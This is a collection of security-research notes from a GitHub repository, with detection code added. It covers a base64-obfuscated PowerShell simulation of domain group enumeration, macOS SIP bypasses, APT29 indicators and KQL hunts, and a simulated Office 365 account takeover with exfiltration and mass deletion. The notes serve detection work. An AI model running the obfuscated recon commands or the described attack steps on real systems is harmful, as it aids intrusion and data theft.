![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8aefd6d0-2c15-432a-9f49-2db312203136)
> Advanced Hunting : tracking net command activities

## Simulation
```powershell
# Each line decodes a base64 string to the plain-text net command shown in its comment,
# then runs it with Invoke-Expression.

# Run net user /domain
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IHVzZXIgL2RvbWFpbg==")))

# Run net group /domain
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwIC9kb21haW4=")))

# Run net group "Domain Admins" /domain
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAvZG9tYWlu")))

# Run net group "Enterprise Admins" /domain
# (the encoded string previously spelled the group "Enterprize Admins", which no such group would match)
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwICJFbnRlcnByaXNlIEFkbWlucyIgL2RvbWFpbg==")))

# Run net group "Schema Admins" /domain
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("bmV0IGdyb3VwICJTY2hlbWEgQWRtaW5zIiAvZG9tYWlu")))
```
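The KQL in the "Hunting with KQL" section above keys on the `net.exe` child process, which MDE records with its plain-text command line even when the parent PowerShell hid it behind `FromBase64String`. The Python below is an added example (not code from the note) that reproduces the query's predicate and its per-device `CmdList`/`Case` summary over constructed DeviceProcessEvents-style records, and adds the decode step for the `Invoke-Expression ([...]::FromBase64String("..."))` pattern used by the simulation script, so the hidden command is visible to the same filter if only the PowerShell parent event is available. The timestamps, device names and command lines are constructed sample data.

```python
"""Offline companion to the net.exe reconnaissance hunting query (added
example, not from the original note). Reproduces:

 1. the query's filter (net.exe with /domain, user or group on the command
    line), summarised per device like the KQL summarize/extend/order;
 2. a decoder for the Invoke-Expression/FromBase64String pattern from the
    ninja.ps1 simulation, applied to PowerShell parent events.
"""
import base64
import re
from collections import defaultdict
from typing import Dict, List

# Captures the base64 argument of [Convert]::FromBase64String("...") in a command line.
_B64_ARG = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
RECON_TERMS = ("/domain", "user", "group")   # same terms as the KQL has_any()
POWERSHELL = ("powershell.exe", "pwsh.exe")


def decode_embedded_base64(command_line: str) -> List[str]:
    """Return the UTF-8 strings hidden in FromBase64String("...") calls."""
    decoded = []
    for blob in _B64_ARG.findall(command_line):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 / not text: leave it alone
    return decoded


def is_net_recon(file_name: str, command_line: str) -> bool:
    """The query's predicate: FileName == net.exe and a recon term on the command line.
    (Substring containment approximates KQL's term-based has_any.)"""
    lowered = command_line.lower()
    return file_name.lower() == "net.exe" and any(t in lowered for t in RECON_TERMS)


def summarize(events: List[dict]) -> Dict[str, dict]:
    """Per device: the timestamped matching commands (CmdList) and their count (Case),
    ordered by Case descending, mirroring the KQL output."""
    per_device = defaultdict(list)
    for ev in events:
        cmdline = ev["ProcessCommandLine"]
        if ev["FileName"].lower() in POWERSHELL:
            # Parent event: decode the blob and judge the decoded text as a net command.
            for text in decode_embedded_base64(cmdline):
                if is_net_recon("net.exe", text):
                    per_device[ev["DeviceName"]].append(f"{ev['Timestamp']} : {text} (decoded)")
        elif is_net_recon(ev["FileName"], cmdline):
            per_device[ev["DeviceName"]].append(f"{ev['Timestamp']} : {cmdline}")
    result = {d: {"Case": len(c), "CmdList": c} for d, c in per_device.items()}
    return dict(sorted(result.items(), key=lambda kv: kv[1]["Case"], reverse=True))


# Constructed sample records shaped like DeviceProcessEvents rows.
SAMPLE_EVENTS = [
    {"Timestamp": "2024-01-10 09:00:01", "DeviceName": "win11cc", "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -c Invoke-Expression ([System.Text.Encoding]::UTF8.GetString('
                           '[Convert]::FromBase64String("bmV0IHVzZXIgL2RvbWFpbg==")))'},
    {"Timestamp": "2024-01-10 09:00:02", "DeviceName": "win11cc", "FileName": "net.exe",
     "ProcessCommandLine": 'net group "Domain Admins" /domain'},
    {"Timestamp": "2024-01-10 09:00:03", "DeviceName": "win11cc", "FileName": "net.exe",
     "ProcessCommandLine": "net use"},                       # no recon term: filtered out
    {"Timestamp": "2024-01-10 09:05:00", "DeviceName": "srv2016", "FileName": "net.exe",
     "ProcessCommandLine": "net user svc_backup /domain"},
]


if __name__ == "__main__":
    for device, row in summarize(SAMPLE_EVENTS).items():
        print(device, row["Case"], *row["CmdList"], sep="\n  ")
```

For the sample data the summary lists win11cc first with two commands (the decoded `net user /domain` and the Domain Admins lookup) and srv2016 with one, while `net use` drops out, just as it would under the query's `has_any` filter. In real telemetry both the PowerShell parent and the net.exe child are recorded, so the decoded row is a cross-check rather than the only evidence.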
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day14-macOS-SIP-Bypass-Insights.md:
--------------------------------------------------------------------------------
# Day 14 - macOS SIP Bypass insights
Hi there !! Thank you for visiting [@SecurityResearch-Note](https://github.com/LearningKijo/SecurityResearcher-Note).
Last time, I had the opportunity to delve deeper into macOS exploitation, specifically focusing on ***"SIP Bypass"***.
However, macOS is relatively new to me, with features like SIP (System Integrity Protection), entitlements, TCC (Transparency, Consent, and Control), and more.
That's why I thought that a very brief summary would be beneficial for someone new to macOS.

## What is SIP ?
SIP is one of the security features in macOS designed to protect critical system files and processes from being tampered with or modified by unauthorized users or malicious software.

**Let's consider disabling SIP from a red team perspective....**

On macOS, even the root user is not allowed to modify important system files under SIP protection, and this is called ***"Rootless"***.
Therefore, in terms of privilege escalation, gaining root user access on macOS doesn't provide attackers much for exploitation because of SIP.
Not to mention, there is [a legitimate way to disable SIP](https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection#3599244), but it requires booting into recovery mode, which would be difficult for an attacker to accomplish.
I would say ***"SIP provides a robust level of protection on macOS"***.

As we may have observed, disabling SIP is not easy and cannot be accomplished with just a few bash commands.
I couldn't even find any publicly available penetration testing tools for it.
In the end, when elevating privilege, the focus should be on ***"macOS vulnerabilities"***.

> [!Note]
> System Integrity Protection includes protection for these parts of the system:
> - /System, /usr, /bin, /sbin, /var
> - Apps that are pre-installed with the Mac operating system
>
> > [About System Integrity Protection on your Mac](https://support.apple.com/en-us/102149#:~:text=System%20Integrity%20Protection%20is%20a%20security%20technology%20designed%20to%20help,and%20folders%20on%20your%20Mac.)


## SIP & Entitlement
After learning about the SIP security feature, I have a better understanding of how challenging it is for attackers to exploit the critical system, thanks to its robust protection.
That's why attackers often seek ways to bypass SIP without disabling it.
While I was reading through the Microsoft security blog - [Shrootless](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/), I came across a key sentence that explains ***"the relationship between SIP and entitlements"***, which has a significant impact on SIP bypass attacks.

![image](https://github.com/LearningKijo/Malware-Analysis/assets/120234772/2ed0f115-2cc8-42ec-b054-4adcd2b1b852)

***"In short, if there is a process with entitlements that allow it to modify the critical system, it is possible to bypass SIP on macOS."***

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/fbe77589-a3a7-47fc-bcd3-0acbf1b30885)

> e.g. 'Shrootless' - system_installd entitlements

> [!Important]
> According to Apple's documentation, an [entitlement](https://developer.apple.com/documentation/bundleresources/entitlements) is a right or privilege that grants an executable particular capabilities.
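The point of the "SIP & Entitlement" section is that the SIP-relevant capability of a binary is readable from its entitlements, and that an entitlement such as `com.apple.rootless.install.heritable` extends to child processes. The Python below is an added example (not code from the note or from Microsoft) that audits an entitlements property list for the `com.apple.rootless.*` namespace and flags heritable ones. On a Mac the XML would come from `codesign -d --entitlements :- <binary>`; here a constructed plist is embedded so the audit runs anywhere, and the only entitlement key in it taken from the note is `com.apple.rootless.install.heritable` (the others are a real sandbox key and a constructed placeholder).

```python
"""Audit a macOS entitlements plist for SIP-relevant (com.apple.rootless.*)
entitlements. Added example, not from the original note.

The plist below is constructed. Real input on macOS comes from, e.g.,
    codesign -d --entitlements :- /path/to/binary
"""
import plistlib
from typing import Dict, List

SIP_PREFIX = "com.apple.rootless."

# Constructed entitlements plist shaped like codesign's XML output.
SAMPLE_ENTITLEMENTS_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.rootless.install.heritable</key>
    <true/>
    <key>com.apple.rootless.example-placeholder</key>
    <false/>
    <key>com.apple.security.app-sandbox</key>
    <true/>
</dict>
</plist>
"""


def parse_entitlements(xml_bytes: bytes) -> Dict[str, object]:
    """Parse the XML plist into a dict of entitlement key -> value."""
    data = plistlib.loads(xml_bytes)
    if not isinstance(data, dict):
        raise ValueError("entitlements plist must contain a dict at the top level")
    return data


def sip_relevant(entitlements: Dict[str, object]) -> List[dict]:
    """Return the com.apple.rootless.* entitlements that are actually granted.

    A boolean false is treated as not granted; any other value (true, a
    string, a list of paths) is reported. `heritable` marks the entitlements
    whose name ends in .heritable, i.e. those the note explains pass to child
    processes such as scripts spawned by system_installd.
    """
    findings = []
    for key, value in entitlements.items():
        if not key.startswith(SIP_PREFIX) or value is False:
            continue
        findings.append({"key": key, "value": value, "heritable": key.endswith(".heritable")})
    return findings


def audit(xml_bytes: bytes = SAMPLE_ENTITLEMENTS_XML) -> List[dict]:
    """Convenience wrapper: parse, then filter."""
    return sip_relevant(parse_entitlements(xml_bytes))


if __name__ == "__main__":
    for finding in audit():
        tag = " (heritable: inherited by child processes)" if finding["heritable"] else ""
        print(f"{finding['key']} = {finding['value']!r}{tag}")
```

For the sample plist the audit reports only `com.apple.rootless.install.heritable` as granted and heritable; the `<false/>` placeholder and the unrelated sandbox entitlement are left out. Run over the entitlements of every binary under the SIP-protected paths, the same filter produces the inventory of processes worth watching for the kind of child-process abuse the Shrootless and Migraine write-ups describe.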

## SIP Bypass case
Shrootless and Migraine are great examples of SIP bypass, both discovered by the Microsoft Threat Intelligence team.
As each blog covers the details, I would like to share a high-level insight with a summary below.

### Shrootless
On October 21, 2021, [Microsoft](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/) discovered a new macOS vulnerability, known as [CVE-2021-30892](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30892) or Shrootless, which has the potential to bypass System Integrity Protection.
While examining macOS processes with SIP bypass entitlements, ***Microsoft found 'system_installd,' which had a powerful 'com.apple.rootless.install.heritable' entitlement, allowing child processes to bypass SIP restrictions.***
When installing an Apple-signed package, 'system_installd' handles the installation.
If the package contains post-install scripts, they're executed using the 'zsh' shell, which ***automatically runs commands from the '/etc/zshenv' file***, even in non-interactive mode.
This creates a potential avenue for attackers to perform arbitrary operations by creating a malicious '/etc/zshenv' file and waiting for 'system_installd' to invoke 'zsh'.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/5462c1bb-434f-4b19-936f-930acb5e77e9)


### Migraine
After the discovery of Shrootless (CVE-2021-30892), [Microsoft](https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/) identified a new macOS vulnerability with similarities, referred to as [CVE-2023-32369](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32369) or Migraine, on May 30, 2023.
This vulnerability also has the potential to bypass System Integrity Protection. The attack can be initiated by starting the migration process through the Migration Assistant, which is one of the processes with entitlements to bypass SIP security checks. The Migration Assistant, in turn, interacts with other processes that have the necessary entitlements. ***Among these processes are bash and perl, which are interpreters capable of executing arbitrary code.***

As a result, an attacker can exploit this flow to run suspicious or malicious code by leveraging the Migration Assistant's interaction with these processes.
By executing arbitrary code within the context of these trusted processes, the attacker can effectively bypass SIP protections and carry out actions that could compromise system integrity or install persistent malware.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/502ba15f-83f2-4728-a20f-ff04f3c7d9c3)

If you are interested in the details, I highly recommend reading the blogs, and you can find the links in the Reference section.

## Reference
- October 28, 2021, [Microsoft finds new macOS vulnerability, Shrootless, that could bypass System Integrity Protection](https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/)
- May 30, 2023, [New macOS vulnerability, Migraine, could bypass System Integrity Protection](https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/)
--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day02-APT29-Part2-Midnight-Blizzard.md:
--------------------------------------------------------------------------------
# Day 2 - APT29, Midnight Blizzard (YTTRIUM)
> 📢 April 18, 2023 - Microsoft has changed its naming taxonomy for threat actors, moving away from using element symbols to using [weather-related names](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/). The APT29 attack was named Midnight Blizzard in Microsoft's new naming taxonomy for threat actors. In this blog, I will use the name "YTTRIUM" instead of Midnight Blizzard.


## What is YTTRIUM ?
YTTRIUM is a codename that Microsoft has given to a specific activity group believed to be part of APT29 or Cozy Bear, a Russian state-sponsored advanced persistent threat group known for its cyber espionage activities. This group is known for using advanced hacking techniques, including spear phishing, zero-day exploits, and social engineering tactics, to target government agencies, critical infrastructure, and other high-profile organizations.

> **Note** : Microsoft Security blog - "Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM"

### What is the difference between Yttrium and Nobelium?
Yttrium and Nobelium are two separate threat groups that have been linked to **APT29 (Cozy Bear) in the past**, but they are not the same group. Also, the two groups are believed to have different tactics, techniques, and procedures (TTPs) and may have different targets.


## YTTRIUM Attack Chain
APT29, also known as YTTRIUM, initiated their cyber attack through a combination of **spear-phishing email attacks** and **social engineering**.
The malicious links in the emails, if clicked by the recipients, led to a series of exploits that ultimately resulted in the installation of a DLL backdoor. This backdoor gave the attackers remote access to the victims' machines.



> [Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)

#### Regarding the compromised website, was the email link initially not malicious?
Yes, that's correct. The attackers compromised a legitimate website that was not originally malicious. By doing so, the attackers were able to host their malicious code on the website and deliver it to unsuspecting visitors.

#### Did email security tools prevent the initial malicious link used in the APT29 attack?
Some mail security tools were able to identify the spear-phishing email used in the APT29 attack at the time, but not all security tools could do so. It depends on the specific tool being used. Nowadays, most security tools have improved their detection capabilities and would likely be able to identify similar attacks.

#### What is an LNK file?
LNK is a file extension used for Windows Shortcut Files. It is a file format used by Windows to create shortcuts to files, folders, or programs. In APT29 attacks, attackers can craft LNK files that appear legitimate but actually point to malicious code or websites.

#### What is Cobalt Strike?
It is a penetration testing tool. In Cobalt Strike, a local named pipe is created with the format **`\\.\pipe\MSSE-<number>-server`**, where `<number>` is a random number between 0 and 9897. Then, the attacker connects to the named pipe and sends global data with size 0x3FE00. Finally, the attacker uses this named pipe to implement a backdoor, giving them access to the compromised system.
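The named-pipe naming convention described for Cobalt Strike above (`\\.\pipe\MSSE-<number>-server`, number between 0 and 9897) is a concrete, checkable artifact. The Python below is an added example (not code from the note or from Microsoft) that validates pipe names against exactly that pattern and range over constructed sample records. The records are shaped like Defender for Endpoint `DeviceEvents` rows with `ActionType == "NamedPipeEvent"`, with the pipe name assumed to have been flattened out of the event's additional fields into a `PipeName` key; that key name, the device names and the process names are constructed.

```python
"""Detect named pipes matching the Cobalt Strike MSSE-<number>-server pattern
described in the note. Added example, not from the original note; sample
records are constructed.
"""
import re
from typing import List, Optional

# Literal \\.\pipe\MSSE-<digits>-server; backslashes are doubled for the regex engine.
MSSE_PIPE = re.compile(r"^\\\\\.\\pipe\\MSSE-(\d+)-server$", re.IGNORECASE)
MAX_NUMBER = 9897  # upper bound of the random number quoted in the note


def msse_pipe_number(pipe_name: str) -> Optional[int]:
    """Return the embedded number if the pipe name fits the pattern and range, else None."""
    match = MSSE_PIPE.match(pipe_name)
    if not match:
        return None
    number = int(match.group(1))
    return number if 0 <= number <= MAX_NUMBER else None


def find_suspicious_pipes(events: List[dict]) -> List[dict]:
    """Filter NamedPipeEvent records to those whose pipe name matches the pattern."""
    hits = []
    for ev in events:
        if ev.get("ActionType") != "NamedPipeEvent":
            continue
        number = msse_pipe_number(ev.get("PipeName", ""))
        if number is None:
            continue
        hits.append({
            "DeviceName": ev.get("DeviceName"),
            "PipeName": ev["PipeName"],
            "Number": number,
            "Process": ev.get("InitiatingProcessFileName"),
        })
    return hits


# Constructed sample records (assumed flattened shape of DeviceEvents NamedPipeEvent rows).
SAMPLE_EVENTS = [
    {"ActionType": "NamedPipeEvent", "DeviceName": "ws01",
     "PipeName": r"\\.\pipe\MSSE-1234-server", "InitiatingProcessFileName": "rundll32.exe"},
    {"ActionType": "NamedPipeEvent", "DeviceName": "ws01",
     "PipeName": r"\\.\pipe\MSSE-99999-server", "InitiatingProcessFileName": "rundll32.exe"},  # out of range
    {"ActionType": "NamedPipeEvent", "DeviceName": "ws02",
     "PipeName": r"\\.\pipe\lsass", "InitiatingProcessFileName": "lsass.exe"},                # benign name
    {"ActionType": "ProcessCreated", "DeviceName": "ws02",
     "PipeName": r"\\.\pipe\MSSE-7-server", "InitiatingProcessFileName": "cmd.exe"},          # wrong event type
]


if __name__ == "__main__":
    for hit in find_suspicious_pipes(SAMPLE_EVENTS):
        print(hit)
```

Only the first record survives: the second fails the 0..9897 range check, the third does not match the name, and the fourth is not a named-pipe event. The pattern is a naming convention rather than proof of Cobalt Strike, so a hit is a pivot into the creating process and its network activity, not a verdict on its own.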

![image](https://user-images.githubusercontent.com/120234772/229047009-be2be785-b3c8-4759-9960-ffc14a79b1a3.png)
> Cobalt Strike, [Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)

## KQL : Hunting
In the [Microsoft Security blog](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/), they provide excellent hunting queries for APT29 (YTTRIUM). However, the tables they used appear to be outdated. Therefore, I updated these queries using the latest tables to track them down. Additionally, I highlighted some IoCs that were covered in the out-of-the-box queries provided in the blog.

#### YTTRIUM IoC
```kql
// Indicator values as used in the queries below (not a runnable query by itself)
SHA1 = "9858d5cb2a6614be3c48e33911bf9f7978b441bf"
SHA1 = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1"
RemoteUrl = "pandorasong.com"
RemoteIP = "95.216.59.92"
ProcessCommandLine contains "https://www.jmj.com/personal/nauerthn_state_gov"
ProcessCommandLine contains "-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0"
```

#### Advanced hunting query
```kql
//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents, DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)

//Query 2: C&C connection
DeviceNetworkEvents
| where Timestamp > ago(10d)
| where RemoteUrl == "pandorasong.com"

//Query 3: Malicious PowerShell
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains "-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0"

//Query 4: Malicious domain in default browser commandline
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains "https://www.jmj.com/personal/nauerthn_state_gov"

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,
DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)

// Reference :
// https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
```
## Reference

- MITRE ATT&CK®, [Home > Groups > APT29](https://attack.mitre.org/groups/G0016/)
- Microsoft, [MITRE ATT&CK APT 29 evaluation proves Microsoft Threat Protection provides deeper end to end view of advanced threats](https://www.microsoft.com/en-us/security/blog/2020/04/21/mitre-attack-evaluation-prove-microsoft-threat-protection-against-threats/)
- Microsoft, [Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/en-us/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)

--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part2.md:
--------------------------------------------------------------------------------
# Cloud-Based Identity to Exfiltration Attack (Part2)
This blog is part 2. If you haven't seen part 1, I highly recommend visiting [Day16-CloudId-Exfiltration-AttackReport-Part1.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md).

#### Background
Identity attacks have been increasing every single day. Over the past few years, attackers have been observed attempting to transition from on-premise to cloud environments for further exploitation.
Today, I would like to showcase some detection insights regarding attacks, starting from cloud-based identity attacks and extending to a compromised Office 365 environment.

Here is the complete attack scenario that I simulated manually, step by step.

"Assuming the attacker has obtained the email address information and requires a password to log in to Office 365/Outlook, they begin by attempting to access it with various easily guessable passwords at random.
After a few attempts, they manage to guess the password, but their access is blocked by MFA (Multi-Factor Authentication).
Subsequently, they resort to repeatedly requesting MFA approval to exhaust the targeted user, a technique known as MFA fatigue.
Eventually, after 10-15 attempts, the user approves access due to exhaustion."

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3354a892-e4a3-4ac0-a126-cb6abd3f3421)
> Cloud-Based Identity to Exfiltration : Attack flow

## Attack Simulation : Part 2
As I've divided this attack insight into two parts, I would like to focus on the activity after the attacker successfully logs into Office 365.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/14c3faa8-06af-48fb-ae15-c61785083e85)


### Suspicious Forwarding rules
After the successful login, we observed the creation of forwarding rules in the alert and attack story.
Additionally, as depicted in the incident graph, we can discern the impacted user account and email account.
Moreover, we identified the IP address the attacker used and captured the forwarding destination address, potentially revealing the attacker's email address used for information leakage through Outlook.

In terms of the alert timeline, Microsoft Defender for Cloud Apps initially detected suspicious activity from a captured Tor IP address, which included the creation of a forwarding rule from a Tor IP address originating in Germany. This was followed by a "Suspicious Email Forwarding Rule" alert.
Additionally, Microsoft Defender XDR correlated the "Impossible Travel activity" alert from [Part 1](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day16-CloudId-Exfiltration-AttackReport-Part1.md) with "Suspicious Inbox Forwarding Rule", ultimately identifying ***"Suspicious email forwarding rule"*** as the XDR source.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/da5a1f43-dc95-4fc4-8657-a309477aabc9)


In order to view the detailed values from the forwarding rule creation, we can use Microsoft Defender for Cloud Apps, App Connector, Office 365, and access the raw JSON data / values.
Here are examples from two alerts.
```

"Name" : "ForwardTo", "Name" : "SubjectContainsWords"
"Value": "xxxxxxxxxxx@outlook.com", "Value": "Info;Data;Important"
--------------------------------------------------------------------
"Name" : "ForwardTo", "Name" : "SubjectContainsWords"
"Value": "xxxxxxxxxxx@outlook.com", "Value": "Payment;Money;Invoice"
```

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4a9648e2-066f-467e-abab-d1ec6ff9feb8)
> Alert page / Source / App Connector / View raw data

### Mass Download
After creating the forwarding rules, we observed the attacker moving to a SharePoint site to conduct further activities.
Based on the generated alerts, it appears that the attacker is attempting to download a number of files from the SharePoint site, ***possibly for the purpose of file exfiltration***.

The key information is to examine the related activities on the alert page.
```
1. Activity - Download file : SharePoint site url
2. User - Darol, compromised user account
3. App - SharePoint
4. IP address - Attacker/ Tor IP address
5. Location - Germany, using a Tor browser
```

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e68b06d4-1be6-47ad-9992-d9554d049044)

By selecting [Investigate in activity log], you can view all file download activities initiated by the attacker using the Tor browser.
We confirmed ***a total of 54 download activities*** in the end.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/c382f3d8-c89b-4ea5-bfe3-cd89a36122b7)
> Alert page / Investigate in activity log / Activity log

Additionally, "Anonymous IP address" was captured in the previous suspicious login phase.
Microsoft Defender XDR correlated the "Mass download" activities and integrated them into a new alert - ***"Suspicious behavior: Mass download"***.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/dd3a5da6-4be7-45f1-ba3e-a1d565ebf40f)


### Mass Delete
The final activity involved deleting files in the SharePoint site, categorized as 'Impact' and ['Data Destruction'](https://attack.mitre.org/techniques/T1485/) in MITRE ATT&CK.
Similar to the download activity, Microsoft Defender for Cloud Apps monitored these deletion activities, capturing IP addresses, locations, file activity, user accounts, and related applications.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7a520fcd-eb90-4e46-8618-b8f2c7cc9e4f)

By selecting [Investigate in activity log], you can view all file deletion activities initiated by the attacker using the Tor browser. We confirmed ***a total of 206 delete activities*** in the end.
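The forwarding-rule parameters and the mass download / delete activity above can also be hunted in advanced hunting instead of being read off the alert pages. The KQL below is an added example of mine, not the original post's or Microsoft's query; it assumes the CloudAppEvents ActionType values New-InboxRule, Set-InboxRule, FileDownloaded and FileDeleted, the Application name "Microsoft SharePoint Online", and the Exchange `Parameters` Name/Value array inside RawEventData, while the domain list, keyword list and thresholds are constructed placeholders.

```kql
// Added example, not from the original post: hunt the attack chain above in CloudAppEvents.
// Assumptions (verify against your tenant's data): ActionType values New-InboxRule / Set-InboxRule
// and FileDownloaded / FileDeleted, Application "Microsoft SharePoint Online", and the Exchange
// "Parameters" Name/Value array inside RawEventData. Domain list and thresholds are placeholders.
let lookback = 7d;
let internalDomains = dynamic(["contoso.com"]);            // constructed: your own accepted domains
let suspiciousWords = dynamic(["invoice", "payment", "money", "important", "data", "info"]);
// 1. Inbox rules whose ForwardTo / RedirectTo target lies outside the tenant
let ForwardingRules =
    CloudAppEvents
    | where Timestamp > ago(lookback)
    | where ActionType in ("New-InboxRule", "Set-InboxRule")
    | extend Params = parse_json(RawEventData).Parameters
    | mv-apply P = Params on (
        summarize
            ForwardTo    = make_set_if(tostring(P.Value), tostring(P.Name) in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")),
            SubjectWords = make_set_if(tostring(P.Value), tostring(P.Name) == "SubjectContainsWords")
      )
    | mv-expand Target = ForwardTo to typeof(string)
    | extend TargetDomain = tolower(extract(@"@([A-Za-z0-9.-]+)", 1, Target))
    | where isnotempty(TargetDomain) and TargetDomain !in (internalDomains)
    // rules that only forward mail matching money / data keywords, as in the two alerts above
    | extend KeywordFiltered = tostring(SubjectWords) has_any (suspiciousWords)
    | project RuleTime = Timestamp, AccountObjectId, AccountDisplayName, RuleIP = IPAddress,
              RuleFromAnonymousProxy = IsAnonymousProxy, RuleCountry = CountryCode,
              ActionType, Target, SubjectWords, KeywordFiltered;
// 2. Bulk download / delete from SharePoint, bucketed per hour, account, source IP and action
let MassActivity =
    CloudAppEvents
    | where Timestamp > ago(lookback)
    | where Application == "Microsoft SharePoint Online"
    | where ActionType in ("FileDownloaded", "FileDeleted")
    | summarize Events = count(), Files = dcount(ObjectName), FirstSeen = min(Timestamp), LastSeen = max(Timestamp)
        by bin(Timestamp, 1h), AccountObjectId, IPAddress, IsAnonymousProxy, CountryCode, ActionType
    // 54 downloads and 206 deletes in the simulation; anonymising proxies are suspicious at any volume
    | where Events >= 50 or IsAnonymousProxy == true;
// 3. Accounts that did both: an external forwarding rule and bulk file activity afterwards
ForwardingRules
| join kind=inner (
    MassActivity
    | summarize MassEvents = sum(Events), MassActions = make_set(ActionType), MassIPs = make_set(IPAddress)
        by AccountObjectId
  ) on AccountObjectId
| project-away AccountObjectId1
| order by RuleTime asc
```

Each `let` can be run on its own when you only want the forwarding rules or only the bulk file activity; the final join narrows the result to accounts that show the whole chain.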

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/01dae4cc-0930-4f6a-b7ed-2502cf1d0020)
> Alert page / Investigate in activity log / Activity log

Similar to the downloading activity, ***the deletion activity is also correlated into one alert, "Suspicious behavior: Mass delete", by Microsoft Defender XDR***.
XDR was looking at two alerts : "Anonymous IP addresses" and "Mass deletion" activities.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3c3522c1-fcd5-405b-b677-fe154ace958d)

I hope this simulation and detection insight were helpful for you. This time, we focused on showcasing an attack - an identity-based cloud breach and the subsequent move to further attacks in Office 365.
